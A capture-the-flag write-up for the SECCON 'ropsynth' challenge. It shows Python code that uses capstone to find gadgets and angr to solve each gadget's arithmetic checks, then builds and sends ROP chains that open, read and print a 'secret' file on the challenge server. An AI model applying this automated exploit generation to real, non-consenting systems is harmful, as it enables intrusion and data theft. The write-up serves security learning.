Hey!

In my last writeup, I demonstrated how to use radare2 and angr for some limited automated exploit generation. After an angr-only version of this solution even made its way into the angr-doc examples, I thought it was time to show some more angr-sugar, this time together with capstone.

For the ropsynth challenge, we were given a tgz archive containing the files “launcher.c”, “launcher.elf”, “ropsynth.py”, “seccomp-bpf.h”, “start_server.sh” and a Makefile. Additionally, the challenge description told us to connect to their service, open a file named “secret”, read its content and write it to stdout.

The most important file for the preliminary analysis is probably launcher.c, which reads a number of gadgets from stdin into a specially mapped page and a ropchain onto the stack, both in binary format. Additionally, the string “secret” is strcpy’ed to a custom mapped page at 0x00a00000. Afterwards, the function start_rop() is called, which basically places a small stub in memory and uses seccomp to restrict the syscalls to open, read, write, close, munmap and exit_group, before calling the freshly mapped stub. The stub itself just unmaps the binary and issues a ret with the first address taken from the supplied ropchain.

The second interesting file is ropsynth.py, the script running on the server. Analyzing it shows that it generates gadgets in a black-box fashion, sends them to us base64-encoded and expects us to send back a ropchain, also base64-encoded. Afterwards, it passes the gadgets and the ropchain to the launcher and checks whether the secret file was read and written correctly. If this procedure succeeds 5 times, the service tells us the flag.

Thus, to sum it up, in order to solve the challenge we have to:

1) connect to the service
2) read gadgets provided by the binary
3) generate a ropchain which would open the file "secret" and read/write its content
4) send the ropchain to the service
5) repeat steps 2-4 four more times
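
Steps 2 and 4 boil down to base64 handling around whatever transport is used. A minimal sketch, assuming the gadgets arrive as one base64 line and the ropchain goes back the same way; the helper names decode_gadgets and encode_ropchain are made up for illustration and are not part of ropsynth.py:

```python
import base64

def decode_gadgets(line):
    """Turn one base64 line received from the service into raw gadget bytes."""
    return base64.b64decode(line.strip())

def encode_ropchain(chain):
    """Turn a binary ropchain into the newline-terminated base64 line to send."""
    return base64.b64encode(chain) + b"\n"

# round trip with two dummy bytes (pop rdi; ret) standing in for real gadgets
blob = decode_gadgets(b"X8M=\n")
reply = encode_ropchain(blob)
```

Everything between these two calls (disassembling, locating gadgets, solving the checks) operates on the raw bytes.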

After retrieving, base64-decoding and disassembling some gadgets, it became obvious that they all follow the same format - an exemplary disassembled gadget-blob can be found here. In essence, we have several gadgets that start by popping two registers, where the second one gets happily xor’ed, sub’ed and add’ed with immediates. A subsequent cmp validates whether this register holds a specific value after this arithmetic madness. If so, execution continues either to another gadget, which again pops a register and xors/adds/subs its content around, or to a return. If one of the validation checks fails at any point, a hlt instruction is issued and execution stops. Additionally, a couple of special gadgets are present, which do something else instead of popping the first register: one which carries out a syscall, and several which push rax and pop it into another register. These are certainly useful for generating the desired open/read/write ropchain.
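
To make the check pattern concrete: each gadget applies a fixed chain of xor/add/sub operations with immediates to the popped value and compares the result against a constant. The solution in this post lets angr find the matching input, but for such a simple pattern the chain could also be inverted by hand. A small sketch of that alternative, with made-up immediates that are not taken from a real gadget blob:

```python
MASK = 0xFFFFFFFFFFFFFFFF  # registers are 64 bit wide, arithmetic wraps around

def apply_chain(value, ops):
    """Run the gadget's arithmetic forwards, as the CPU would."""
    for op, imm in ops:
        if op == "xor":
            value ^= imm
        elif op == "add":
            value = (value + imm) & MASK
        elif op == "sub":
            value = (value - imm) & MASK
    return value

def invert_chain(target, ops):
    """Undo the chain back to front to get the value that must be popped."""
    for op, imm in reversed(ops):
        if op == "xor":
            target ^= imm
        elif op == "add":
            target = (target - imm) & MASK
        elif op == "sub":
            target = (target + imm) & MASK
    return target

# hypothetical immediates and compare constant
ops = [("xor", 0x1337), ("add", 0x42), ("sub", 0x1000)]
needed = invert_chain(0xdeadbeef, ops)
```

Feeding needed back through apply_chain yields 0xdeadbeef again, which is exactly the property the cmp in the gadget checks for.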

At this point, it became clear that this challenge would be an excellent fit for angr. However, before firing up the symbolic execution engine, some parsing has to be done in order to identify the location of the gadgets. First of all, the gadget-blob should be disassembled automatically, which is actually super easy with capstone.

from capstone import *

def disassemble_binary(code):
    binary = []

    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(code, 0x00800000):
        binary.append(i)

    return binary

Afterwards, we need a way to identify the location of the gadgets we want to use - once again, we can use capstone!

def find_pop_reg(binary, reg):
    for i in binary:
        if i.insn_name() == 'pop' and i.op_str == reg:
            return i.address
    
def find_push_rax_pop_reg(binary, reg):
    #start at 1 so that binary[i-1] never wraps around to the last instruction
    for i in range(1, len(binary)):
        if binary[i].insn_name() == 'pop' and binary[i].op_str == reg \
           and binary[i-1].insn_name() == 'push' and binary[i-1].op_str == 'rax':
            return binary[i-1].address

def find_syscall(binary):
    for i in binary:
        if i.insn_name() == 'syscall':
            return i.address 
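
The push rax / pop reg search is essentially a scan over adjacent instruction pairs. A sketch of the same idea written with zip, run against stand-in objects so that it works without capstone; FakeInsn is a hypothetical helper that only mimics the insn_name(), op_str and address members used above:

```python
class FakeInsn(object):
    """Stand-in for a capstone instruction (hypothetical, illustration only)."""
    def __init__(self, address, name, op_str=""):
        self.address = address
        self._name = name
        self.op_str = op_str

    def insn_name(self):
        return self._name

def find_push_rax_pop_reg_pairs(binary, reg):
    """Return the address of the first 'push rax' directly followed by 'pop <reg>'."""
    for prev, cur in zip(binary, binary[1:]):
        if prev.insn_name() == 'push' and prev.op_str == 'rax' \
           and cur.insn_name() == 'pop' and cur.op_str == reg:
            return prev.address
    return None

# invented listing: the blob starts with a pop and ends with a push
listing = [
    FakeInsn(0x800000, 'pop', 'rdx'),
    FakeInsn(0x800001, 'ret'),
    FakeInsn(0x800002, 'push', 'rax'),
    FakeInsn(0x800003, 'pop', 'rdx'),
    FakeInsn(0x800004, 'push', 'rax'),
]
found = find_push_rax_pop_reg_pairs(listing, 'rdx')
```

Since zip only ever pairs true neighbours, the push at the very end of the listing is never treated as the predecessor of the pop at the very beginning.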

Now, I used some wrapper functions for generating parts of the ropchain, which mostly set up the target-address for the next return and then invoke angr to generate the values needed to pass all checks:

import struct

def do_syscall(binary, project):
    syscall = find_syscall(binary)

    pl = struct.pack("<Q",syscall)
    #the syscall instruction is 2 bytes long, so let angr start right after it
    pl += angrize(project, syscall+2)
    return pl


def mov_reg_rax(binary, project, reg):
    push_rax = find_push_rax_pop_reg(binary, reg)

    pl = struct.pack("<Q",push_rax)
    pl += angrize(project, push_rax)
    return pl


def set_reg(binary, project, reg, val):
    pop_reg  = find_pop_reg(binary, reg)
    pl = struct.pack("<Q",pop_reg)
    pl += struct.pack("<Q",val)

    #pop rdi/rsi/rdx/rax is a single byte, so pop_reg+1 is the next instruction
    pl += angrize(project, pop_reg+1)
    return pl

As one can see, the core function carrying out the work is angrize(), which takes an already opened angr project and the entry address for the analysis as arguments. The entry address is chosen to skip the syscall or the first register pop in the respective cases, to enforce a consistent stack-frame layout for angr and to keep angr from misinterpreting a syscall when rax is not initialized.
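
The stack layout produced by one set_reg step can be pictured as follows. This is only an illustration with invented addresses and check values; in the actual solution the trailing quadwords come from angrize():

```python
import struct

def layout_set_reg(gadget_addr, reg_value, check_values):
    """Pack one ropchain fragment as little-endian quadwords: the return
    target, the register value, then the values for the checked pops."""
    pl = struct.pack("<Q", gadget_addr)   # consumed by the previous ret
    pl += struct.pack("<Q", reg_value)    # consumed by the gadget's first pop
    for v in check_values:                # consumed by the validated pops
        pl += struct.pack("<Q", v)
    return pl

# hypothetical numbers, not taken from a real gadget blob
frag = layout_set_reg(0x00800010, 0x00a00000, [0x1111, 0x2222])
words = struct.unpack("<4Q", frag)
```

The address of the next gadget simply follows the fragment, which is why the wrappers can be concatenated one after another.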

So, let’s finally have a look at the angrize-function, generating the right payload-values for us:

def angrize(project, entry):
    pl = ''

    #generate a state and a path_group
    path = project.factory.blank_state(addr=entry)
    pg = project.factory.path_group(path)

    #explore
    pg.explore()

    #get the state with the right values
    x = pg.deadended[0]
    
    #dump the stack and put the values in our payload
    #the stack starts at 0x7ffffffffff0000 for an x86_64 blank_state
    for i in xrange(0x7ffffffffff0000, x.state.se.any_int(x.state.regs.rsp),8):
        #memory endianness defaults to big endian, so enforce little endian
        val = x.state.se.any_int(x.state.memory.load(i,endness='Iend_LE'))
        pl += struct.pack("<Q",val)

    return pl

So, why does this work? Or, more precisely: why is pg.deadended[0] the state we are looking for? Well, first it has to be pointed out that we absolutely want to hit a ret instruction to regain control. However, in a blank_state the stack is empty, and whenever angr loads an uninitialized memory value, it is treated as a symbolic value. This means that the address popped from the stack by the ret instruction is an unconstrained symbolic value, and thus it is undecidable where execution has to continue. Therefore, the corresponding path is put into the deadended stash of the path group. However, this does not happen silently; in fact, angr emits a warning about it:

WARNING | 2016-12-15 12:11:20,965 | simuvex.s_run | Exit state has over 257 possible solutions. Likely unconstrained; skipping. <BV64 mem_7ffffffffff0028_334_64>

Furthermore, all other paths will hit a hlt instruction, causing them to be moved into the errored-stash, so that the path group will not have any active states, which ends the exploration.

Alright, let’s put it all together:

import base64
import angr

def solve_stage(s):

    b64 = s.ru('\n')

    code = base64.b64decode(b64)
    #the gadget blob is raw machine code, so write it in binary mode
    with open('tmp.bin','wb') as binary_file:
        binary_file.write(code)

    project = angr.Project("./tmp.bin", load_options={
        'main_opts': {
            'backend': 'blob',
            'custom_base_addr': 0x00800000,
            'custom_arch': 'x86_64',
        },
    })

    
    binary = disassemble_binary(code)

    pl = ''
    pl += set_reg(binary, project, 'rdi', 0x00a00000)
    pl += set_reg(binary, project, 'rsi', 0x4)
    pl += set_reg(binary, project, 'rdx', 0x0)
    pl += set_reg(binary, project, 'rax', 0x2)
    pl += do_syscall(binary, project)

    pl += mov_reg_rax(binary, project, 'rdi')
    pl += set_reg(binary, project, 'rsi', 0x00a00000)
    pl += set_reg(binary, project, 'rdx', 0x256)
    pl += set_reg(binary, project, 'rax', 0x0)
    pl += do_syscall(binary, project)

    pl += mov_reg_rax(binary, project, 'rdx')
    pl += set_reg(binary, project, 'rdi', 0x1)
    pl += set_reg(binary, project, 'rax', 0x1)
    pl += do_syscall(binary, project) 

    pl = base64.b64encode(pl)
    s.send(pl+'\n')



def main():
    s = Socket(('ropsynth.pwn.seccon.jp',10000))

    for i in range(1,6):
        print '[+] Solving Stage %d' %i   
        s.ru('stage %d/5\n' % i)
        solve_stage(s)

    s.interact()
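
For reference, the three stages built in solve_stage follow the x86_64 Linux syscall convention (number in rax, arguments in rdi, rsi, rdx). The table below merely restates the values from the code as data; the name SYSCALL_PLAN and the 'rax' / None markers are illustrative and not part of the original script:

```python
# x86_64 Linux syscall numbers used by the chain
SYS_READ, SYS_WRITE, SYS_OPEN = 0, 1, 2

BUF = 0x00a00000  # page that initially holds the string "secret"

# (syscall number, rdi, rsi, rdx); 'rax' marks a value forwarded from the
# previous syscall's return value, None marks a register left untouched
SYSCALL_PLAN = [
    (SYS_OPEN,  BUF,   0x4,  0x0),    # open("secret", 4, 0) -> fd in rax
    (SYS_READ,  'rax', BUF,  0x256),  # read(fd, BUF, 0x256) -> length in rax
    (SYS_WRITE, 0x1,   None, 'rax'),  # write(1, BUF, length), rsi is still BUF
]
```

The forwarded values are what the push rax / pop reg gadgets are needed for: the file descriptor moves into rdi before the read, and the number of bytes read moves into rdx before the write.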

Cheers,

nsr